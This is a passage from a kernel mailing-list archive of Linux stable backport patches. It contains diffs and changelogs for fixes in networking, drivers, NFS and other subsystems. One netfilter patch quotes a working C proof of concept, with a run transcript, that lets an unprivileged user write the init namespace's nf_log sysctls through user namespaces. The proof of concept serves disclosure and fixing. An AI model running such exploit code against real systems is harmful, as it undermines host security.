+++ b/drivers/infiniband/core/uverbs_main.c
@@ -224,12 +224,9 @@ static int ib_uverbs_cleanup_ucontext(struct ib_uverbs_file *file,
container_of(uobj, struct ib_uqp_object, uevent.uobject);

idr_remove_uobj(&ib_uverbs_qp_idr, uobj);
- if (qp != qp->real_qp) {
- ib_close_qp(qp);
- } else {
+ if (qp == qp->real_qp)
ib_uverbs_detach_umcast(qp, uqp);
- ib_destroy_qp(qp);
- }
+ ib_destroy_qp(qp);
ib_uverbs_release_uevent(file, &uqp->uevent);
kfree(uqp);
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:07 UTC
Permalink
From: Johan Hovold <***@kernel.org>

commit ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream.

Make sure to drop the reference taken by class_find_device() after
opening the RTC device.

Fixes: 77437fd4e61f (pm: boot time suspend selftest)
Signed-off-by: Johan Hovold <***@kernel.org>
Signed-off-by: Rafael J. Wysocki <***@intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
kernel/power/suspend_test.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/kernel/power/suspend_test.c b/kernel/power/suspend_test.c
index 269b097..743615b 100644
--- a/kernel/power/suspend_test.c
+++ b/kernel/power/suspend_test.c
@@ -169,8 +169,10 @@ static int __init test_suspend(void)

/* RTCs have initialized by now too ... can we use one? */
dev = class_find_device(rtc_class, NULL, NULL, has_wakealarm);
- if (dev)
+ if (dev) {
rtc = rtc_class_open(dev_name(dev));
+ put_device(dev);
+ }
if (!rtc) {
printk(warn_no_rtc);
goto done;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:07 UTC
Permalink
From: Max Staudt <***@suse.de>

commit d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream.

When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).

The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.

With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").

Fixes: 7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+
Signed-off-by: Max Staudt <***@suse.de>
Acked-By: Peter Jones <***@redhat.com>
Signed-off-by: Tomi Valkeinen <***@ti.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/video/efifb.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/video/efifb.c b/drivers/video/efifb.c
index 50fe668..08dbe8a 100644
--- a/drivers/video/efifb.c
+++ b/drivers/video/efifb.c
@@ -270,9 +270,9 @@ static int efifb_setcolreg(unsigned regno, unsigned red, unsigned green,
return 1;

if (regno < 16) {
- red >>= 8;
- green >>= 8;
- blue >>= 8;
+ red >>= 16 - info->var.red.length;
+ green >>= 16 - info->var.green.length;
+ blue >>= 16 - info->var.blue.length;
((u32 *)(info->pseudo_palette))[regno] =
(red << info->var.red.offset) |
(green << info->var.green.offset) |
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:07 UTC
Permalink
From: Linus Torvalds <***@linux-foundation.org>

Not upstream as it is not needed there.

So a patch something like this might be a safe way to fix the
potential infoleak in older kernels.

THIS IS UNTESTED. It's a very obvious patch, though, so if it compiles
it probably works. It just initializes the output variable with 0 in
the inline asm description, instead of doing it in the exception
handler.

It will generate slightly worse code (a few unnecessary ALU
operations), but it doesn't have any interactions with the exception
handler implementation.

Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
arch/x86/include/asm/uaccess.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
index 5ee2687..995c49a 100644
--- a/arch/x86/include/asm/uaccess.h
+++ b/arch/x86/include/asm/uaccess.h
@@ -381,7 +381,7 @@ do { \
asm volatile("1: mov"itype" %1,%"rtype"0\n" \
"2:\n" \
_ASM_EXTABLE_EX(1b, 2b) \
- : ltype(x) : "m" (__m(addr)))
+ : ltype(x) : "m" (__m(addr)), "0" (0))

#define __put_user_nocheck(x, ptr, size) \
({ \
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:07 UTC
Permalink
From: Douglas Caetano dos Santos <***@taghos.com.br>

commit 2fe664f1fcf7c4da6891f95708a7a56d3c024354 upstream.

With TCP MTU probing enabled and offload TX checksumming disabled,
tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
into the probe's SKB had an odd length. This was caused by the direct use
of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
fragment being copied, if needed. When this fragment was not the last, a
subsequent call used the previous checksum without considering this
padding.

The effect was a stale connection in one way, as even retransmissions
wouldn't solve the problem, because the checksum was never recalculated for
the full SKB length.

Signed-off-by: Douglas Caetano dos Santos <***@taghos.com.br>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/ipv4/tcp_output.c | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 465285b..1f2f6b5 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -1753,12 +1753,14 @@ static int tcp_mtu_probe(struct sock *sk)
len = 0;
tcp_for_write_queue_from_safe(skb, next, sk) {
copy = min_t(int, skb->len, probe_size - len);
- if (nskb->ip_summed)
+ if (nskb->ip_summed) {
skb_copy_bits(skb, 0, skb_put(nskb, copy), copy);
- else
- nskb->csum = skb_copy_and_csum_bits(skb, 0,
- skb_put(nskb, copy),
- copy, nskb->csum);
+ } else {
+ __wsum csum = skb_copy_and_csum_bits(skb, 0,
+ skb_put(nskb, copy),
+ copy, 0);
+ nskb->csum = csum_block_add(nskb->csum, csum, len);
+ }

if (skb->len <= copy) {
/* We've eaten all the data from this skb.
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:01 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit 20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream.

A malicious TCP receiver, sending SACK, can force the sender to split
skbs in write queue and increase its memory usage.

Then, when socket is closed and its write queue purged, we might
overflow sk_forward_alloc (It becomes negative)

sk_mem_reclaim() does nothing in this case, and more than 2GB
are leaked from TCP perspective (tcp_memory_allocated is not changed)

Then warnings trigger from inet_sock_destruct() and
sk_stream_kill_queues() seeing a not zero sk_forward_alloc

All TCP stack can be stuck because TCP is under memory pressure.

A simple fix is to preemptively reclaim from sk_mem_uncharge().

This makes sure a socket wont have more than 2 MB forward allocated,
after burst and idle period.

Signed-off-by: Eric Dumazet <***@google.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/net/sock.h | 10 ++++++++++
1 file changed, 10 insertions(+)

diff --git a/include/net/sock.h b/include/net/sock.h
index 6d2fbac..a46dd30 100644
--- a/include/net/sock.h
+++ b/include/net/sock.h
@@ -1422,6 +1422,16 @@ static inline void sk_mem_uncharge(struct sock *sk, int size)
if (!sk_has_account(sk))
return;
sk->sk_forward_alloc += size;
+
+ /* Avoid a possible overflow.
+ * TCP send queues can make this happen, if sk_mem_reclaim()
+ * is not called and more than 2 GBytes are released at once.
+ *
+ * If we reach 2 MBytes, reclaim 1 MBytes right now, there is
+ * no need to hold that much forward allocation anyway.
+ */
+ if (unlikely(sk->sk_forward_alloc >= 1 << 21))
+ __sk_mem_reclaim(sk, 1 << 20);
}

static inline void sk_wmem_free_skb(struct sock *sk, struct sk_buff *skb)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:01 UTC
Permalink
From: Eli Cooper <***@gmx.com>

commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 upstream.

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

Cc: ***@vger.kernel.org
Signed-off-by: Eli Cooper <***@gmx.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/net/ip6_tunnel.h | 1 +
1 file changed, 1 insertion(+)

diff --git a/include/net/ip6_tunnel.h b/include/net/ip6_tunnel.h
index 4da5de1..b140c60 100644
--- a/include/net/ip6_tunnel.h
+++ b/include/net/ip6_tunnel.h
@@ -75,6 +75,7 @@ static inline void ip6tunnel_xmit(struct sk_buff *skb, struct net_device *dev)
int pkt_len, err;

nf_reset(skb);
+ memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
pkt_len = skb->len;
err = ip6_local_out(skb);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:01 UTC
Permalink
From: Steffen Maier <***@linux.vnet.ibm.com>

commit 70369f8e15b220f50a16348c79a61d3f7054813c upstream.

In the hardware data router case, introduced with kernel 3.2
commit 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
the ELS/GS request&response length needs to be initialized
as in the chained SBAL case.

Otherwise, the FCP channel rejects ELS requests with
FSF_REQUEST_SIZE_TOO_LARGE.

Such ELS requests can be issued by user space through BSG / HBA API,
or zfcp itself uses ADISC ELS for remote port link test on RSCN.
The latter can cause a short path outage due to
unnecessary remote target port recovery because the always
failing ADISC cannot detect extremely short path interruptions
beyond the local FCP channel.

Below example is decoded with zfcpdbf from s390-tools:

Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_san_req+0408
Record id : 1
Tag : fssels1
Request id : 0x<reqid>
Destination ID : 0x00<target d_id>
Payload info : 52000000 00000000 <our wwpn > [ADISC]
<our wwnn > 00<s_id> 00000000
00000000 00000000 00000000 00000000

Timestamp : ...
Area : HBA
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_hba_fsf_res+0740
Record id : 1
Tag : fs_ferr
Request id : 0x<reqid>
Request status : 0x00000010
FSF cmnd : 0x0000000b [FSF_QTCB_SEND_ELS]
FSF sequence no: 0x...
FSF issued : ...
FSF stat : 0x00000061 [FSF_REQUEST_SIZE_TOO_LARGE]
FSF stat qual : 00000000 00000000 00000000 00000000
Prot stat : 0x00000100
Prot stat qual : 00000000 00000000 00000000 00000000

Signed-off-by: Steffen Maier <***@linux.vnet.ibm.com>
Fixes: 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
Reviewed-by: Benjamin Block <***@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <***@suse.com>
Signed-off-by: Martin K. Petersen <***@oracle.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/s390/scsi/zfcp_fsf.c | 4 ++++
1 file changed, 4 insertions(+)

diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8fa6bc4..8e0979c 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -990,8 +990,12 @@ static int zfcp_fsf_setup_ct_els_sbals(struct zfcp_fsf_req *req,
if (zfcp_adapter_multi_buffer_active(adapter)) {
if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_req))
return -EIO;
+ qtcb->bottom.support.req_buf_length =
+ zfcp_qdio_real_bytes(sg_req);
if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_resp))
return -EIO;
+ qtcb->bottom.support.resp_buf_length =
+ zfcp_qdio_real_bytes(sg_resp);

zfcp_qdio_set_data_div(qdio, &req->qdio_req,
zfcp_qdio_sbale_count(sg_req));
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:01 UTC
Permalink
From: Michal Hocko <***@suse.com>

commit 735f2770a770156100f534646158cb58cb8b2939 upstream.

Commit fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
exit") has caused a subtle regression in nscd which uses
CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
shared databases, so that the clients are notified when nscd is
restarted. Now, when nscd uses a non-persistent database, clients that
have it mapped keep thinking the database is being updated by nscd, when
in fact nscd has created a new (anonymous) one (for non-persistent
databases it uses an unlinked file as backend).

The original proposal for the CLONE_CHILD_CLEARTID change claimed
(https://lkml.org/lkml/2006/10/25/233):

: The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
: on behalf of pthread_create() library calls. This feature is used to
: request that the kernel clear the thread-id in user space (at an address
: provided in the syscall) when the thread disassociates itself from the
: address space, which is done in mm_release().
:
: Unfortunately, when a multi-threaded process incurs a core dump (such as
: from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
: the other threads, which then proceed to clear their user-space tids
: before synchronizing in exit_mm() with the start of core dumping. This
: misrepresents the state of process's address space at the time of the
: SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
: problems (misleading him/her to conclude that the threads had gone away
: before the fault).
:
: The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
: core dump has been initiated.

The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
seems to have a larger scope than the original patch asked for. It
seems that limitting the scope of the check to core dumping should work
for SIGSEGV issue describe above.

[Changelog partly based on Andreas' description]
Fixes: fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-***@kernel.org
Signed-off-by: Michal Hocko <***@suse.com>
Tested-by: William Preston <***@suse.com>
Acked-by: Oleg Nesterov <***@redhat.com>
Cc: Roland McGrath <***@hack.frob.com>
Cc: Andreas Schwab <***@suse.com>
Signed-off-by: Andrew Morton <***@linux-foundation.org>
Signed-off-by: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
kernel/fork.c | 10 ++++------
1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/kernel/fork.c b/kernel/fork.c
index 2358bd4..612e78d 100644
--- a/kernel/fork.c
+++ b/kernel/fork.c
@@ -775,14 +775,12 @@ void mm_release(struct task_struct *tsk, struct mm_struct *mm)
deactivate_mm(tsk, mm);

/*
- * If we're exiting normally, clear a user-space tid field if
- * requested. We leave this alone when dying by signal, to leave
- * the value intact in a core dump, and to save the unnecessary
- * trouble, say, a killed vfork parent shouldn't touch this mm.
- * Userland only wants this done for a sys_exit.
+ * Signal userspace if we're not exiting with a core dump
+ * because we want to leave the value intact for debugging
+ * purposes.
*/
if (tsk->clear_child_tid) {
- if (!(tsk->flags & PF_SIGNALED) &&
+ if (!(tsk->signal->flags & SIGNAL_GROUP_COREDUMP) &&
atomic_read(&mm->mm_users) > 1) {
/*
* We don't check the error code - if userspace has
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:01 UTC
Permalink
From: Stephen Suryaputra Lin <***@gmail.com>

commit 969447f226b451c453ddc83cac6144eaeac6f2e3 upstream.

In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().

After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.

So, use the new_gw for neigh lookup.

Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).

Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <***@ieee.org>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/ipv4/route.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index cbad9b8..e59d633 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -713,7 +713,9 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
goto reject_redirect;
}

- n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
+ n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
+ if (!n)
+ n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
if (!IS_ERR(n)) {
if (!(n->nud_state & NUD_VALID)) {
neigh_event_send(n, NULL);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Jann Horn <***@thejh.net>

commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <***@thejh.net>
Signed-off-by: Pablo Neira Ayuso <***@netfilter.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/netfilter/nf_log.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index 3b18dd1..07ed65a 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -253,7 +253,7 @@ static int nf_log_proc_dostring(ctl_table *table, int write,
size_t size = *lenp;
int r = 0;
int tindex = (unsigned long)table->extra1;
- struct net *net = current->nsproxy->net_ns;
+ struct net *net = table->extra2;

if (write) {
if (size > sizeof(buf))
@@ -306,7 +306,6 @@ static int netfilter_log_sysctl_init(struct net *net)
3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
- nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen =
NFLOGGER_NAME_LEN * sizeof(char);
nf_log_sysctl_table[i].mode = 0644;
@@ -317,6 +316,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}

+ for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+ table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Felipe Balbi <***@linux.intel.com>

commit fd9afd3cbe404998d732be6cc798f749597c5114 upstream.

According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a fininte
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."

In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.

Reported-by: Ville Syrjälä <***@linux.intel.com>
Tested-by: Ville Syrjälä <***@linux.intel.com>
Suggested-by: David Miller <***@davemloft.net>
Signed-off-by: Felipe Balbi <***@linux.intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/gadget/u_ether.c | 8 --------
1 file changed, 8 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index aad066d..ef5c623 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -584,14 +584,6 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,

req->length = length;

- /* throttle high/super speed IRQ rate back slightly */
- if (gadget_is_dualspeed(dev->gadget))
- req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
- dev->gadget->speed == USB_SPEED_SUPER)) &&
- !list_empty(&dev->tx_reqs))
- ? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
- : 0;
-
retval = usb_ep_queue(in, req, GFP_ATOMIC);
switch (retval) {
default:
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Kinglong Mee <***@gmail.com>

commit 3f42d2c428c724212c5f4249daea97e254eb0546 upstream.

Connection from alloc_conn must be freed through free_conn,
otherwise, the reference of svc_xprt will never be put.

Signed-off-by: Kinglong Mee <***@gmail.com>
Signed-off-by: J. Bruce Fields <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/nfsd/nfs4state.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
index 4a58afa..b0878e1 100644
--- a/fs/nfsd/nfs4state.c
+++ b/fs/nfsd/nfs4state.c
@@ -2193,7 +2193,8 @@ out:
if (!list_empty(&clp->cl_revoked))
seq->status_flags |= SEQ4_STATUS_RECALLABLE_STATE_REVOKED;
out_no_session:
- kfree(conn);
+ if (conn)
+ free_conn(conn);
spin_unlock(&nn->client_lock);
return status;
out_put_session:
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Gavin Shan <***@linux.vnet.ibm.com>

commit b13460b92093b29347e99d6c3242e350052b62cd upstream.

The macro offsetofend() introduces unnecessary temporary variable
"tmp". The patch avoids that and saves a bit memory in stack.

Signed-off-by: Gavin Shan <***@linux.vnet.ibm.com>
Signed-off-by: Alex Williamson <***@redhat.com>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/vfio.h | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/include/linux/vfio.h b/include/linux/vfio.h
index ac8d488..1a7f0ac 100644
--- a/include/linux/vfio.h
+++ b/include/linux/vfio.h
@@ -86,8 +86,7 @@ extern void vfio_unregister_iommu_driver(
* from user space. This allows us to easily determine if the provided
* structure is sized to include various fields.
*/
-#define offsetofend(TYPE, MEMBER) ({ \
- TYPE tmp; \
- offsetof(TYPE, MEMBER) + sizeof(tmp.MEMBER); }) \
+#define offsetofend(TYPE, MEMBER) \
+ (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER))

#endif /* VFIO_H */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Mike Snitzer <***@redhat.com>

commit 299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream.

v4.8-rc3 commit 99f3c90d0d ("dm flakey: error READ bios during the
down_interval") overlooked the 'drop_writes' feature, which is meant to
allow reads to be issued rather than errored, during the down_interval.

Fixes: 99f3c90d0d ("dm flakey: error READ bios during the down_interval")
Reported-by: Qu Wenruo <***@cn.fujitsu.com>
Signed-off-by: Mike Snitzer <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/md/dm-flakey.c | 27 ++++++++++++++++-----------
1 file changed, 16 insertions(+), 11 deletions(-)

diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
index a9a47cd..ace01a3 100644
--- a/drivers/md/dm-flakey.c
+++ b/drivers/md/dm-flakey.c
@@ -286,15 +286,13 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
pb->bio_submitted = true;

/*
- * Map reads as normal only if corrupt_bio_byte set.
+ * Error reads if neither corrupt_bio_byte or drop_writes are set.
+ * Otherwise, flakey_end_io() will decide if the reads should be modified.
*/
if (bio_data_dir(bio) == READ) {
- /* If flags were specified, only corrupt those that match. */
- if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
- all_corrupt_bio_flags_match(bio, fc))
- goto map_bio;
- else
+ if (!fc->corrupt_bio_byte && !test_bit(DROP_WRITES, &fc->flags))
return -EIO;
+ goto map_bio;
}

/*
@@ -331,14 +329,21 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio, int error)
struct flakey_c *fc = ti->private;
struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));

- /*
- * Corrupt successful READs while in down state.
- */
if (!error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
- if (fc->corrupt_bio_byte)
+ if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+ all_corrupt_bio_flags_match(bio, fc)) {
+ /*
+ * Corrupt successful matching READs while in down state.
+ */
corrupt_bio_data(bio, fc);
- else
+
+ } else if (!test_bit(DROP_WRITES, &fc->flags)) {
+ /*
+ * Error read during the down_interval if drop_writes
+ * wasn't configured.
+ */
return -EIO;
+ }
}

return error;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Arend Van Spriel <***@broadcom.com>

commit ded89912156b1a47d940a0c954c43afbabd0c42c upstream.

User-space can choose to omit NL80211_ATTR_SSID and only provide raw
IE TLV data. When doing so it can provide SSID IE with length exceeding
the allowed size. The driver further processes this IE copying it
into a local variable without checking the length. Hence stack can be
corrupted and used as exploit.

Reported-by: Daxing Guo <***@gmail.com>
Reviewed-by: Hante Meuleman <***@broadcom.com>
Reviewed-by: Pieter-Paul Giesberts <pieter-***@broadcom.com>
Reviewed-by: Franky Lin <***@broadcom.com>
Signed-off-by: Arend van Spriel <***@broadcom.com>
Signed-off-by: Kalle Valo <***@codeaurora.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
index 301e572..2c52430 100644
--- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
+++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
@@ -3726,7 +3726,7 @@ brcmf_cfg80211_start_ap(struct wiphy *wiphy, struct net_device *ndev,
(u8 *)&settings->beacon.head[ie_offset],
settings->beacon.head_len - ie_offset,
WLAN_EID_SSID);
- if (!ssid_ie)
+ if (!ssid_ie || ssid_ie->len > IEEE80211_MAX_SSID_LEN)
return -EINVAL;

memcpy(ssid_le.SSID, ssid_ie->data, ssid_ie->len);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Marcelo Ricardo Leitner <***@gmail.com>

commit bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream.

Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.

The fix is to just move the check upwards so it's also validated for the
1st chunk.

Reported-by: Andrey Konovalov <***@google.com>
Tested-by: Andrey Konovalov <***@google.com>
Signed-off-by: Marcelo Ricardo Leitner <***@gmail.com>
Reviewed-by: Xin Long <***@gmail.com>
Acked-by: Neil Horman <***@tuxdriver.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/sctp/sm_statefuns.c | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)

